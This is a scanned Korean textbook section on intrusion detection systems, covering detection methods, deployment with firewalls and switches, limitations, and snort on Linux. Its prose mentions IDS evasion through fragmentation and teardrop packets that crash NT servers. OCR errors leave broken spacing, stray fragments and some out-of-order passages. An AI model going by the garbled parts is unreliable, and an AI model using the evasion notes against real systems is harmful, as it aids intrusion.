넷째로 해킹사실이 발견되였을 때 해킹에 관한 정보를 휴대용전화，우편 등으로 즉시 
전송하여 망관리 자가 없을 때 에도 보안을 유지할수 있다. 

다섯째로 검출에 그치지 않고 침투경 로까지 추적하여 해커를 적 발하며 자료를 안전한 
곳으로 옮기는 등 방화벽의 수동적 인 대처와는 달리 적극적 인 보안기능을 가지고있다. 

여섯째로 해킹하고있는 도중에 그것을 잡아내기때문에 공격자를 로출시키기 위한 필 
요한 증거를 확보할수 있다. 
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3) IDS 의 기술적구성요소 

— 정 보수집 단계 

정 보수집 단계 는 침 입 정 보뿐아니 라 체 계 의 모든 정 보를 수집 하여 가공 및 압축단계 로 넘 
기 는 기 능을 수행한다. 

一 가공 및 압축단계 

침 입 검 출에 필요한 의 미 있는 정 보만을 압축하는 단계 로 정 보수집 단계 에서 전달받은 정 
보를 기초로 침입검출의 가능성이 있는 자료를 압축한다. 

一분석 및 침입검출단계 

침 입 여부를 판정하는 단계 로서 침 입검 출체 계의 가장 핵 심적 인 요소이 다. 

— 보고 및 처 리 단계 

침 입으로 판단되면 관리자에게 보고하고 관리 자가 조치를 취 하는 단계로 검출된 침 입 
을 차단하는 단계 이다. 

4) IDS 의 분류 

一 자료원천을 기초로 하는 분류 

① 망 IDS (Network IDS : NIDS ) 

망에 서 파케 트흐름을 수집 하여 망을 경 유하는 파케 트를 분석 하여 침 입 을 검 줄해 낸 다. 
호스트에 기초한 IDS 가 호스트에 설치되여야 하는 반면에 망에 기초한 IDS 는 호스트에 기 
초한 IDS 에서 제 공하지 않는 잘못된 파케트에 대 한 정보나 포구뚫기 에 대 한 정보를 획득 
할수 있 고 망의 상황을 리해 하고있기 때 문에 망측면 에 서 대 응할수 있 다. 일 반적 으로 파케 
트에 해당 공격문자렬이 존재하는가를 조사하거나 TCP 포구 및 기발정보를 조사하여 론 
리적으로 맞는가를 검사함으로써 침입을 검출해낸다. 망에 기초한 IDS 는 모든 파케트를 재 
조립하여 분석 하기 때 문에 망의 부하가 크면 파케 트손실 을 일 으킬수 있 고 파케 트자체 가 암 
호화되 여있으면 파케 트를 분석할수 없는 결 함을 가지 고있 다. 

그림 3-19 는 망 IDS 의 위상구조를 보여준다. 

② 호스트기초 IDS 

IDS 가 체 계내부에 설 치되 여 하나의 체 계내부사용자들의 활동을 감시 하고 해 킹시도를 
검 출해 내 는 체 계 이 다. 응용프로그람 기 륵，체 계 기 륵 등의 정 보를 조작체 계 로부터 획 득하 
여 정보를 수집한다. 대부분 간단한 형 태의 자료이지만 그 자료의 성격은 해 당 응용프로 
그람에 종속되 기 때 문에 잘못된 자료를 수집할수 있 다. 

모든 호스트에 1회 용통과암호，생체 인식 등의 특별가입등록쏘프트웨어 가 탑제 되 여 야 
한다. 또한 공격 자가 기 록을 삭제 하거 나 변조하는것 을 막기 위 해 IDS 는 기 록파일 을 전문 
기록봉ᄎ기나 일반사용자들이 접근 못하는 호스트에 보관하여야 한다. 

트형 IDS 는 비루스주사장치와 류사하게 작용한다. 그것은 보호하려는 체계상에 
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서 배경처리로서 돌아가면서 이상작용을 검출하게 된다. 이상작용에는 HTTP 요청을 통 
하여 미지의 지령들을 보내려는 시도나 파일체계변경 등이 포함된다. 이상작용이 검출되 
였을 때 IDS 는 공격하는 대화를 중지시키고 체계의 기본관리자에게 경보를 보낼수 있다. 



In trail e t 봉사기 


그림 3-19 망 IDS 의 위상구조 

호스트기 초 IDS 가 언제 효과적 인가를 간단한 실례 를 통하여 고찰해보자. 

보호하려는 웨브봉사기 가 DMZ 망토막우에 위 치 하고있다고 가정 하자. 이 DMZ 는 방 
화벽뒤에 있지만 웨브봉사기만을 포함하는 토막과 분리된 상태에 있다. 방화벽은 HTTP 
로 웨 브봉사기 에 로의 자료흐름만 허 락하도록 구성 되 여있 다. 

이러한 경우에 호스트기초 IDS 제품은 웨브봉사기를 보호하는데 충분하다. 그것은 방 
화벽 이 대부분의 보호를 제공해주기때문이다. 방화벽은 웨브봉사기로 할수 있는 자료흐 
름이 오직 HTTP 요청뿐이라는것을 확인하게 된다. . 

호스트기 초침 입검 출체 계 는 의 심 스러 운 파일 접 근요청 이 라든가 CGI 와 Java 리용이 이 
러 한 HTTP 요청속에 포함되 여 있지 않으며 체 계 상에 서 가동하는 웨 브봉사기 에 로 통과되 지 
않는다는것 만을 담보하여 야 한다. 호스트기 초 IDS 는 완전교환환경 에 서 매 우 유익할수 있 
다. 이에 대한 론의를 그림 3-19 에서 보여주었다. 이 그림에서 모든 체계들은 교환기에 
직접 련결된다. 실제상 이것은 매개 체계에 그 자신의 충돌구역을 가져다준다. 즉 교환 
기가 통신에 참가한 두 체계만이 자료흐름을 볼수 있도륵 모든 단일자료흐름을 분리시 킨다. 

교환기가 통신대화를 분리시키기때문에 망에 기초한 IDS 는 모든 통과하는 망자료흐 
틈을 알수 없게 된다. 만일 작업국이 인트라네트 웨브봉사기에 대항하여 공격을 개시한 
다면 IDS 는 공격이 진행되고있으며 그래서 보복수단을 취하기 곤난하다는것을 
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아차리지 못하게 된다. 뿐만아니라 이것은 공격이 IDS 경과기록에 나타나지 않고 사건기 
륵도 되 지 않는다는것 을 의 미한다. 

호스트기초 IDS 는 인트라네트 웨브봉사기를 보호하는데 제 일 유리할수 있다. 이것은 
보호하려는 체계상에서 가동하기때 문에 교환기의 자료흐름분리속성 의 영 향을 받지 않는다. 
웨브봉사기가 살피고있는 모든 자료흐름을 알기때문에 HTTP 에 기초한 공격으로부터 체 
계를 보호할수 있게 한다. 

一 침입모형에 기초한 분류 

① 오용검 출방법 (Misuse Dectection ) 

알려 진 공격 방법 이 나 보안방책 을 위 반하는 행 위 에 대 한 패 런을 지 식 자료기 지 로부터 찾 
아서 특정한 공격들과 체계취 약점 에 기 초하여 평 가된 지식 을 적용하여 검출해 내는 방법으 
로서 일 명 지 식 기 반 ( Knowledge - Base ) 이 라고도 한다. 

자신이 가지고있는 지식에 기초하여 취약점들에 대한 정보를 알아내고 해당 취약점을 
리용하려 는 시 도를 찾기 때 문에 비 교적 검 출의 정 확도가 높다. 

지 식자료기지는 대 단히 중요한 요소이 며 계 속적 인 갱 신이 필요하다. 

오유검 출방법은 허위 경보 (False alarm ) 률이 매우 낮으며 보안체계 에 의 해 제공된 문 
맥 적 분석 이 매 우 세 밀 하기 때 문에 보안관리자가 방어하거 나 혹은 수정 하기 가 쉽다. 결 함으 
로 보면 알려진 공격 에 대 한 정보수집 이 어 렵고 새 로운 취 약성 에 대 한 최 신정보를 유지 하 
기가 쉽지 않다. 

지식자료기지를 유지한다는것은 새로운 취약성에 대한 세밀한 분석을 필요로 하기때 
문에 시 간소비 형 (Time cxmsuming ) 업 무를 수행 하여 야 하는 부담이 있으며 분석 과정 에 같 
은 방법의 공격을 검출할수 없다. 

조작체 계 및 체 계 가동환경，응용프로그람에 의 존된 지 식자료기 지 가 필 요하게 되 며 자 
료기지의 관리가 어렵다. 

IDS 는 주어 진 환경 에 종속적 이 며 특권을 행 사하는 내 부공격 자검 줄에 서 는 공격 자가 특 
권을 리 용하여 취 약성공격 을 하지 않기 때 문에 검 출이 불가능한 결 함도 가지 고있 다. 

② 비 정 상적 인 침 입 검 출수법 (Anomaly Detection ) 

체 계사용자가 정 상이 거 나 예 상된 동작에 서 벗 어났는가를 조사함으로써 공격 을 검 출하 
는 방법을 말한다. 

비 정 상적 인 침 입 이 란 를퓨터 자원의 비 정 상적 인 행 위 (anomalous behavior ) 나 사용에 근 
거한 침입을 말한다. 

례 를 들면 한 사용자의 를퓨터 사용시 간이 오전 9시 부터 오후 5시 까지 인데 근무시 간 
이 후에 콤퓨터 를 사용하는 경 우 정 확한 가입등록이 름과 통과암호를 사용하는 정 당한 사용 
이더 라도 침입으로 간주하는 경우를 들수 있다. 
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비정상적인 침입검출수법의 종류 

^ 정 량분석 법 

정상 혹은 유효한 행동모형은 다양한 방법으로 수집된 참조정보들로부터 생성되며 현 
재 활동과 행동모형을 비교함으로써 검출한다. 

림계 값을 두고 정 량적 으로 행위를 분석 하여 림계값을 넘어 가면 경보를 울리는 정 량분 
석법은 체계의 부하를 감소시키는 우점을 가지지만 림계값에 대한 정량적인 설정이 필요 
하다. 

정 량분석 법 은 비 정 상적 인 동작검 출방법 으로 가장 일 반적 으로 쓰이 는 알고리 듬으로서 수 
자형식으로 표현되는 검출규칙과 속성들을 사용한다 

^ 통계 적 인 방법 (Statistical approaches ) 

통계적 인 방법 은 주로 비정상적 인 침 입검출을 통계적 으로 처 리하는 방법 이 다. 과거의 
경험적인 자료를 토대로 처리하기때문에 상당히 정확하게 검출할수 있다. 



그림 3-20. 틍계적인 방법 

검출방법은 먼저 사용자나 사용자가 실행시킨 프로쎄스의 행위를 관찰하고 매개 행위 
에 대한 프로파일을 생성한다. 생성된 프로파일들을 주기적으로 관찰하여 프로파일의 비 
정상적 인 행위를 측정한다. 

프로파일 의 비 정 상성 을 측정하는 방법 들은 다음과 같다. 

첫째 로 ; 작용 ( activity ) 의 세 기 ( intensity ) 를 측정 하는 방법 
둘째 로 ; 파일 접 근이 나 I / O 작용의 분포를 측정하는 방법 
셋째 로; 가입등록의 회 수를 측정하는 방법 
넷째 로; CPU 나 I / O 의 사용량을 측정하는 방법 

우의 방법들을 사용하여 사용자의 행위가 정상적인 행위인가 아닌가를 측정할수 있다. 
통계적 인 방법의 우점은 통계적으로 잘 연구된 방법들을 사용할수 있다는것 이다. 
또한 주기적인 자료의 변경이나 유지보수가 필요없다. 

결함은 다음과 같다. 
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첫째로; 통계적인 방법은 어떤 행위의 발생순서에 민감하지 못하다는것이다. 

둘째로; 순수한 통계적인 침입검출체계는 어떤 행위의 변경사항이 작은 경우에는 정 
상이라고 할수 있기때문에 점차적으로 비정상적 인 행위도 정상이라고 잘못 판단할수 있다. 

셋째로; 어떤 행위 가 정상인가 아닌가를 판정할수 있는 림 계값 ( threshold ) 을 설정하 
기 가 힘들다. 

넷째 로; 순수한 통계 적 인 방법 을 사용하여 모형화할수 있는 행위 의 종류가 제 한되 여 
있는것 이 다. 

^ 특징추출 (Feature Selection ) 

특징추출은 특정침 입패 런을 추출하는 방법 으로서 경험적 인 침 입검출측정도구의 모임 
을 구성 하고 침 입의 예측，분류가능한 침 입검출도구의 부분모임을 결정하여 침 입을 예측하 
거 나 분류한다. 



^ 비정상적 인 행위 측정 방법 들 (anomaly measures ) 의 결합 

이 방법은 여러 비정상적인 행위 측정방법들을 사용하여 매개의 결과를 통합하여 특 
정 행위 가 정상인지 비정 상인지를 측정하는 방법 이 다. 사용하는 측정 방법들에 는 Bayesian 
Statistics , Covariance Matrices , Belief Network 등이 있다. 

n 예측가능한 패런 생성 (Predictive Pattern Generation ) 

이 방법은 특정 한 행위를 이루는 사건 ( event ) 의 순서 가 우연적 이지 않고 인식 할수 
있는 패 런이 라는 가설에 근거하며 사건사이 의 상호관계 와 순서 를 설명할수 있다. 시 간의 
존규칙 ( time-based rule ) 을 사용하여 매개의 사건에 시 간을 부여 할수 있으며 사건의 순서 
가 정확한 경우에도 시간의 간격에 따라 주어진 사건들이 정상인지 비정상인지 검출할수 
있 다. 

례 를 들어 그림 3-22 과 같이 E 1 이 발생 한 후 E 2 와 E 3 이 발생 하고 E 4 가 발생 할 확 
률이 95%이 고， E 5 가 발생 할 확률이 5%라면 E 4 가 발생 하는것 이 정 상이 고， E 5 가 발생 하 
ᅵ정상일것이다. 이와 같이 발생할 확률이 작은 사건인 경우를 침입이라고 간주하 
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c 卜믐에 예측 n gg 


줄력층 


그림 3-23. 신경망 


그림 3-23 에서 보면 현재의 명령과 과거에 수행시켰던 명령들을 입력층에 입력시 
키면 신경망은 스스로 학습하여 다음에 수행될 명령을 출력층에서 나타내게 된다. 

신경망의 우점은 통계적인 방법과 같이 자료의 특성에 의존할 필요가 없으며 잡음이 많 
은 자료를 잘 검출할수 있고 출력에 영향을 줄수 있는 다양한 방법들사이의 호상관계를 잘 
나타낼수 있다. 

또한 기록된 자료를 학습하여 망을 구성하고 차후의 사건에 대한 자료를 망에 적용시 
키는 방법으로 적응해 나간다는 우점을 가지 고있다. 

결 함은 신경 망의 위 상과 매 개 구성 요소사이 에 주어 지 는 무게값을 여 러 번 
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여 검출할수 있게 한다. 이 방법의 결함은 규칙에서 표현되지 않은 행위의 패런은 비정상 
이 라고 인식할수 없 다는것 이 다. 



그림 3-22. 예측가능한 패턴생성 


우점은 특정행위가 일련의 순서를 가전 패런이라면 이 행위의 다양한 변형형태를 처 
리할수 있으며 의심이 가는 전체 가입등록대화보다 더 자세하게 관련된 사건들을 처리할 
수 있기때문에 사건준위에서의 비정상적인 행위를 검출할수 있다 

^ 신경망 (Neural Network ) 

이 방법에서는 명령의 순서를 신경망으로 학습시켜서 다음에 수행될 명령을 미리 예 
측할수 있다. 다음에 수행되는 명령을 예측할수 있기때문에 정상인지 비정상인지를 검출 
할수 있다. 



이 Tnh 이니 이니 

재 S 거개 
S 명 nt W 







Lirnix 당보안 


에 야 결정 할수 있 다는것 이 다. 또한 현재 의 명 령 과 과거 의 W 개 의 명 령 을 설정 할 때 W 의 크 
기는 신경망설계에 중요한 요소로 설정하기 어렵다. 방의 크기가 큰 경우에는 보다 정확 
한 결과를 얻을수 있지만 학습시간이 많이 걸리고 방의 크기가 작은 경우에는 학습시간은 
빠르지만 결과가 정확하지 않을수도 있기때문이다. 

결함은 또한 정상과 비정상을 구분하는 기준이 없다는것 이다. 

^규칙기초방법 

우에서 론의한 통계적 인 방법과 류사하며 차이점은 이 방법 이 사용패런들을 보관하고 
표현하기 위 한 규칙 모임 들을 사용한다는것 이 다. 

cr 선택 적검출방법 (Alternative Detection ) 

현대침 입 검 출방법 으로서 오용검 출이 나 비 정 상적검 출부류와는 다르다. 


cr 면역체계 

이 방법 에서 는 self 八 mself 기 술을 리 용한다. 비 록 이 기 술이 강력 하기 는 하지 만 침 입 
검출에 완전한 해결로는 되지 못한다. 

@ 유전알고리듬 

진화알고리듬이 라고 부르는 알고리 듬부류의 한가지 형태 이다. 

침 입검출처 리는 매 사건자료에 대 한 가설벡토르를 정의한다. 이 벡 토르는 침 입 인가 아 
닌가를 지정한다. 그다음 가설은 그것 이 유효한가를 결정 하기 위해 시 험되며 이 렇게 개선 
된 가설이 나오고 시험결과에 기초하여 적용된다. 

이 과정은 해답이 나올 때까지 반복된다. 


5) IDS 의 응답 

분석이 진행된 후에 체계는 공격에 대하여 알고있는것만큼 그 문제성을 지정해야 한다 
침 입검출처 리모둘에서 이것은 응답부분에 의해 조종된다. 

一 응답의 요구조건 

일부 응답들은 사건조종에 대한 현재의 표준안대로 설계되고있으며 다른 것들은 국부 
적 인 관리임 무와 방책 들을 반영 하기 도 한다. 

一 응답의 류형 

침 입검출체계의 응답은 능동응답과 피동응답으로 갈라볼수 있다 

능동응답에 서 체 계 는 자동적 으로 또는 사용자에 의 해 무시 되 거 나 공격 과정 에 영 향을 준다. 

피 동응답에 서 체 계 는 단순히 제 기 되는 문제 를 보고하고 기 륵한다. 

一 관측과정에 추적 

체계가 공격받는 상태에 있을 때에는 경고를 발생하는것과 함께 침입자를 막아버리도 
륵 경 고한다. 이 방법은 침 입 자의 대화가 계속 진행중에 있는 동안에도 계속 조사활동을 진 
한다. 이 경 우 통보와 경 고는 숨은 경 로를 통하여 수행한다 
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一 응답을 보안방책에 반영 

침 입 검 출체 계 의 리 용을 최 량화하기 위 하여서 는 응답을 최 적 화된 보안방책 과 절 차들에 
포함시키는것이 좋다. 

이것을 수행하기 위한 한가지 방도로서는 검출된 침입이나 보안회피에 대하여 해당한 
행동을 지정하도록 하는것 이다. 

6) 침입위험성의 분석 

이 부분은 침입검출의 특수한 경우로 된다. 

위험성분석은 정적분석 알고리듬에 속한다. 정적분석 알고리듬을 불련속적 인 구간에서 분 
석 되 고 표본화된 정 보원천을 참조하는 구간기 초분석 방법이 라고도 부론다. 

一 위험성분석 

위험성분석은 체계의 보안상태나 그의 구성에 대한 분석으로서 그 시간구간내에 종합 
된 정보에 토대하고있다. 

이 처 리는 침 입검출체계와 관련되는 동적분석 방법과 차이난다. 

정적분석에 대한 일반적전략은 다음과 같다. 

ᄄ 체계속성의 미리 정의된 모임은 표본화되여야 한다. 

ᄄ 그 자료구역은 적어도 하나의 참조모임에서 정의되고 비교되여야 한다. 

一 믿음성연구 

위 험성 분석알고리듬으로서의 연구방법들은 믿음성연구(피동)와 비믿음성연구(능동) 
의 두가지 부류로 갈타진다. 

이 연구들사이의 차이는 분석된 정보가 믿음성을 가지고 엄었는가 아닌가에 따라 구 
분된다. 

믿음성 이 있는것들로서는 통과암호나 합법 적 으로 체 계 자료객체 에 대 한 호출을 얻는 경 
우를 의 미하여 믿음성 이 없는것들은 체 계 로부터 실행시 반작용동작을 진행하여 다시 들어 
갈수 있는 뒤문을 만들어놓는것들을 말한다. 

一 비믿음성연구 

최근 비믿음성 연구들은 위험성 분석에서 대중화되고있다. 

인터네 트통신의 많은 연구자들이 비믿음성적 인 위험성분석 이 진짜 침 입검출이라고 인 
정하고있 다. 

믿음성연구방법들과 호스트기초연구방법들사이의 련 관은 믿음성이 없는 연구방법들과 
망기 초연구방법 들사이 의 련관성 과 류사하다. 

위험성분석에 대한 믿음성이 없는 연구방법들은 실제적으로 공격들에 대한 체계응답 
을 기록함이 없이 체계공격을 재현하는것 이 다. 

때문에 이 러한 연구방법들은 믿음성연구방법들보다 침입적 이 다. 
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7) 기술적론의 

비 록 침 입검출체 계 가 보안관리모둘의 표준구성 부분으로서 급속히 발전하고있지 만 여 
전히 청소한 기술분야로 남아있다. 

침입검출의 실현을 최적화하는데는 아래와같은 문제들이 제기되고있다. 

一 확장성 

콤퓨터망을 통한 업무가 증가함에 따라 대규모망을 감시하는것은 점점 어려워지고있다. 

위협 환경 이 보다 적 극화되 고 사용자들이 망접 속보안을 강화하려 는 조건에서 망감시 도 
보다 어 려 워 질것 이다. 확장성 은 망의 보안상문제 들이 보다 심 각해지 고 그 수가 증대될 때 
이 문제들을 어떻게 해결하겠는가에 대한 해 답이 다. 

一 관리 

다른 하나의 론의는 침입검출체계관리와 관련한것이다. 단순한 기구의 조종하에서 망 
의 복잡성 이 커지면 보안문제를 론의하게 될것 이며 침 입검출체계를 요구한다. 

8) IDS 의 역할과 한계 

一 역할 

강력한 IDS 보안방책은 상업적 IDS 의 핵심기술이며 악의적 인 망자료흐름에 관한 정 
보를 보관하거나 제공할수 있다 

IDS 는 망보안쎈터를 위한 유용한 도구이며 보안감시기 나 도난경 보기 와 같은 형식으 
로 망을 통해서 들어오는 공격 자를 식별하고 증거를 포착한다. 

망에 대한 침입 이 일어 나고있다는것을 보안관리자에게 실시간적으로 경보하고 통합방 
어전략하부구조로 통합할수 있다. 

一 한계 

모든 보안상 피해를 검출할수 없고 잘못된 경보와 경보실패 가 발생한다. 

광범한 공격 에 의해 IDS 자체 가 마비 될 수 있 으며 망기 반의 IDS 는 고속망에 서 효과 
적인 동작을 하지 않을수 있다. 모든 IDS 는 각기 취약성을 가지고있기때문에 정기적인 검 
사를 통한 강력한 보안방책을 세워 야 한다. 

IDS 는 망에 배 치되 기 전에 평 가를 거 처서 취 약성 을 찾아내 야 하며 강력한 검사를 거 
처야 한다. 

9) IDS 를 포함한 망의 구성 

一 IDS 와 웨브봉사기 

IDS 는 웨브싸이트를 보호할수 있는 중요한 보안수단의 하나로서 항상 가명사용자의 접 
속을 받아야 하는 웨 브봉사기 에 호스트에 기 초한 IDS 를 설 치하여 운영할수 있 다. 

그림 3-24 와 같이 경로설정방식 이 인증되지 않은 공격 자의 침 입을 막고 방화벽 이 내 
부 망을 막아서 침입을 차단하지만 DMZ 망에 놓인 웨브봉사기에는 호스트에 기초한 IDS 
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방화벽 


그림 3-24. 웨브봉사기를 위한 IDS 구성 

IDS 는 정보를 획득하면서 경로기의 방책에 어긋나는 동작이 발견되면 경보를 울려 침 
입을 검출해낸다. 

一 IDS 와 방화벽 

방화벽과 IDS 는 하나의 기능으로 통합될 가능성 이 많은 보안기능이며 현재 많은 방 
화벽제 품들은 방책 에 어긋나는 파케 트들에 대 한 경 보장치 가 실현되 여있기때 문에 이 미 기 
본적인 침 입 검 출을 하고있 다고 할수 있 다. 




그림 3-25. IDS 와 방화벽 

그림 3-25 에서 보는것 처 럼 방화벽과 망에 기초한 IDS 를 함께 설 치 하고 방화벽과 IDS 
의 기능을 동시 에 수행 하면서 방책 에 어긋나는 파케트에 대 한 경보기능과 침 입검출기능을 
수행할수 있 다. 

그림 3-25 에서 처 럼 telnet 파케 트를 경 로기 가 통과시 키 더 라도 IDS 와 방화벽 이 동시 에 
구현된 체 계 에서 웨 브봉사기 로 들어 가는 telnet 파케트에 대 한 경 보를 하고있기 
입검출을 할수 있다. 
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방화벽과 IDS 는 일정한 차이를 가지고있다. 방화벽은 주변감시수단으로 작용한다. 이 
것은 모든 자료흐름이 망의 한 구역에서 다른 구역으로 이동하기 위하여서는 방화벽을 통 
과하여 야 한다는것 을 의 미한다. 방화벽 이 공격당하고 봉사기 들이 파괴 된 다면 자료흐름을 
통과시키지 못하는 전형적인 틀린 열기현상이 나타나게 된다. 이것은 모든 망통신을 마 
비시 키며 방화벽 을 무력하게 만들고 내부호스트에 대 한 공격 을 개시할 기회를 노리는 공 
격 자들을 방해한다. 

어 떤 IDS 들은 망토막들사이 에 놓이 지 않는다. 그것 은 하나의 충돌령 역안에 서 동작 
하도록 설계되 였다. 만일 IDS 가 무력하다면 자료흐름이 정지 되지 않기때 문에 기술적으 
로 틀린 닫기로 된다. 망자원들에 접근하는동안 공격자는 IDS 가 정지되게 할수 있다. 

一 망 IDS 와 교환기 (switching hub ) 

교환기가 련결된 망상에서는 통과하는 모든 파케트를 검사할수 없고 오직 자신에게 오 
는 파케 트만을 볼수 있으며 현재 교환기 의 가격 이 떨어지면서 많은 망들은 집선기보다는 교 
환기 를 구성하는 구조로 변경 되 고있기 때 문에 IDS 의 립장에서 는 해 결 하여 야 할 문제 로 나 
서고있 다. 



IDS 자원 


그림 3 - 26. 망 IDS 와 교환기 (switching hub) 

그림 3-26 과 같이 보호대 상이 되 는 자원호스트 ( Resource ) 와 망의 여 닫개 사이에 집 선 
기를 련결하고 집선기의 한개의 포구는 IDS 에 접속하고 다른 포구는 보호대상에 련결함 
으로써 교환기 에서의 결함을 막을수 있다. 

tap 장비는 파케 트를 단순히 복사해서 다른 곳으로 보내는 역 할을 하고있으며 이 장비 
는 단방향성 이다. 이 를 리용하면 그림 3-27 과 같이 보호대 상이 2대 이 상이 라도 한개 의 집 
선기 를 리용하여 IDS 와 련동할수 있 다. 
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자원 


그림 3-27. 보호대상이 여러개일 때 여담개와 IDS 련결방법 


— IDS 와 VPN 

가상사설망 ( VPN:Virtual Private Network ) 은 모든 자료를 암호화해서 전송하기때문 
에 망에 기초한 IDS 는 침입을 검출할수 없다. 

호스트에 기 초한 IDS 를 사용하면 VPN 장치 에서 제 공하는 많은 기 록과 검 사자료를 리 
용할수 있기때 문에 응용프로그람 준위 에서 IDS 를 운영할수 있다. 

— 망 IDS 와 고속통신망 

망 IDS 는 고속망에 는 적 합하지 않다. IDS 의 검 출속도보다 망의 속도가 빠르면 IDS 는 파 
케 트를 삭제 ( drop ) 하기 시 작하기 때 문에 정 확한 검 줄을 할수 없 다. 

정 확한 IDS 제 품의 평 가를 통해 서 해 당 장비 의 망의 수용림계값을 규정하며 설 치하려 
는 망에 적 합한 IDS 를 구입해 야 한다. 

머리부검사，자료검사 등 여러대의 IDS 가 작업을 분담하여 수행할 경우 IDS 의 성능 
을 높일수 있고 동일한 기능을 가지는 IDS 를 여러개 설치하여 동시에 작업을 수행시켜 검 
출효률을 높일수 있다. 


10) IDS 의 제한성 

IDS 자체의 약점으로 하여 일부 제한성들을 가지고있다. 잡지 《 Infoworld 》 의 대 
중특별기고란의 한 저자는 IDS 가 2000년말에 가서 생명력을 잃는다고 선언하였다. 

교환망기술， 불완전한 공격징후맞추기， IDS 체계들에 과부하를 주는 다량의 망자료 
흐름 그리고 IDS 체계에서 나오는 공격통보를 숨길수 있게 암호화된 망자료들이 그렇게 말 
할수 있는 리유로 된다. 

일반적으로 IDS 에서는 침입검출의 빈도를 측정할 때 시간간격을 측정하여 설정값 범 
위내에 있을 때만을 공격으로 간주하지만 그 간격보다 느린 시간으로 공격을 취할제는 검 
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출할수 없 다. 이 때 시 간을 크게 설 정하면 IDS 에 저 장되 는 상태 값이 증가되 여 IDS 의 자 
원을 많이 사용하게 된다. 

IP 파케 트의 크기 가 망의 최 대 전송단위보다 큰 IP 파케 트를 여 러 개 로 나누어 서 
( fragmentation ) 보내게 되 는데 대부분의 IDS 는 재 조립 ( reassembly ) 기 능을 제 공하지 않 
기때문에 이것을 검출할수 없다. 

망 및 호스트형 IDS 에서는 하나의 호스트에서 들어오는 동작방식 에 의존하여 공격을 
검 출하지 만 공격 자가 호스트를 바꾸면서 공격 을 하면 이 에 대 해서는 방어할수 있는 방법 
이 존재 하지 않는다. 

초기의 호스트형 IDS 제품들은 대부분 특정형식의 체계만을 감시할수 있었다. 실례 
로 NetWork Associate 가 만든 CyberCopServei •는 웨브봉사기들을 보호할 능력만 있다. 
만일 그 봉사기가 여러가지 봉사 ( DNS ， 파일공유， POP 3 등)를 하고있다면 호스트형 IDS 
체계는 침입검출능력이 없을수 있다. 

IDS 의 대 다수가 사용자접 근권한변경 과 같은 핵 심봉사기 능들을 감시 하는 동안 공격 자 
는 체계를 변화시 킬 시도에 앞서 IDS 를 무맥하게 할 방도를 찾는다. IDS 가 무맥하게 되 
였다면 공격자는 체계를 자유롭게 파괴한다. 

다른 문제는 호스트형 IDS 들이 단순히 배경처리로서 가동하며 체계의 핵심통신기능 
에 접근하지 않는다는것이다. 이것은 IDS 가 통신규약탄창 그자체에 대항한 공격을 막을 
능력이 없다는것을 의미한다. 실례로 장비가 약한 NT 봉사기를 파괴하기 위하여서는 10 
개정도의 눈물방울파케트를 리용하면 된다. 이것은 망에 기초한 IDS 가 반작용하고 보복 
수단을 취하는데는 충분한 시간이지만 호스트형 IDS 는 무력하게 남아있게 된다. 왜냐하 
면 이 자료흐름을 전혀 알지 못하기때문이다. 

보호하려 는 체 계상에서 침 입검출프로그람을 돌리는데는 론리적 인 계 산오유가 있다는 
것을 역시 론의할수 있다. 공격자가 체계에 침투할수 있다면 공격자는 더우기 IDS 를 위태 
롭게 한다. 이것은 아주 위험한 일이다. 즉 공격자는 최종보안보호선에 구멍을 내게 된다. 

3.3.2. LINUX 에서 IDS 의 실현방식 

LINUX 에서 IDS 는 크게 2가지로 나누어 볼수 있다. 

즉 파케트준위 IDS 와 응용준위 IDS 가 있다. 

파케 트준위 IDS 는 장치 구동기 층준위 에 서 파케 트를 실 시 간적 으로 수집하여 파케 트머 
리 부정 보 및 자료부정보를 이 미 자료기 자화되 여있는 공격 패 런들과 대 조하여 공격 을 검 출 
하는 체계이다. 

응용준위 IDS 는 체계 가 제 공하는 각종 감시기록파일들과 보안검사지 령들을 리용하여 
인 동작을 검색하여 불법 체계사용자 및 망접속사용자를 검 출하는 체계 이 다. 
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실지 LINUX 에서 실현된 IDS 방식에는 여러가지가 있다. 

1) 파케트준위 IDS 

파케 트준위 IDS 실현의 대 표적 인 쏘프트웨어 는 snort 이 다. 

그러면 snort 에 대해서 구체적으로 고찰하자. 

snort 는 NIDS 로서 공개원천방식의 IDS 표준패 키지 이며 Windows 와 LINUX 에서 사 
용할수 있는 다중가동환경방식 을 지 원하고있 다. NIDS 는 대부분 방화벽 과 함께 사용되 기 
때문에 공격자체에 취 약하지 말아야 하는것 이 필수적 이 다. 따라서 snort 와 련동되여 사용 
되는 모든 망대면장치들은 IP 주소없이 설치되여야 한다. 

Snort 는 실시간망통과량분석과 망상에서 파케트기록이 가능한 일명 《 가벼운 
( lightweight ) 》망침 입 침 입 검 출체 계 이 다. snort 는 파케 트수집 서 고인 libpcap 에 기 초한 일 
종의 망도청 기 라고 볼수 있는데 쉽게 정의할수 있는 침 입검 출규칙들에 일 치되는 망통과량 
을 감시하고 기록하고 경고할수 있는 도구이다. Snort 는 통신규약분석，내용검색 및 정 
합을 수행할수 있으며 완충기 자리넘 침，스텔스포구훑기， CGI 공격， SMB 탐색，조작체계 
확인시도 등의 다양한 공격과 훑기를 검출할수 있다. 또한 이러한 검출규칙들은 인터네트 
보안 싸이트를 통하여 지 속적 으로 갱 신되 고 본인 이 쉽 게 규칙 을 작성하여 추가할수 있으 
므로 최 신 공격 에 적 응하기 쉽다. 

一 snort 의 체계 구성방식 

n 파케트 수집 및 복호화 

LINUX 의 전형 적 인 파케 트수집 서고인 libpcap 를 리용하여 실시 간적 으로 파케 트를 수 
집하여 필요한 복호화동작을 진행하는 모둘이 다. 

^ 규칙모임 

파케 트정 보와 대 조될 공격패 런자료를 본문파일형 식 으로 저 장하고있는 모둘이 다. 

^ 전처리기 및 출력모듈 

snort 동작에 필 요한 환경 을 조성 하고 검 출출력결 과방식 을 설 정한다. 

^ 검출모듈 

수집한 파케 트정 보와 규칙모임 과 대 조하여 공격 을 검 출하는 기 능을 수행한다. 

^ 기록모듈 

검 출결과를 파일 이 나 자료기지 로 보관하는 기 능을 수행한다. 여 기서 리용하는 자료기 
지 는 Mysql 을 리용한다. 
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Snort 기본제계구王 



그림 3 - 28 . snort 의 체계구성방식 


一 snort 의 설치 
亡 ， libpcap 설치 

Snort 는 파케 트를 수집 하기 위 하여 망파케 트수집 서 고인 libpcap 를 필요로 한다. 따라서 
Snort 를 설치 하기 에 앞서 libpcap 가 설치되 여있어 야 한다. 

LINUX 체계 에는 기본적으로 설치되 여있는데 다음의 명 령으로 설치 여부를 확인할수 
있 다. 

# rpm -q libpcap 
libpcap -0. 4-10 

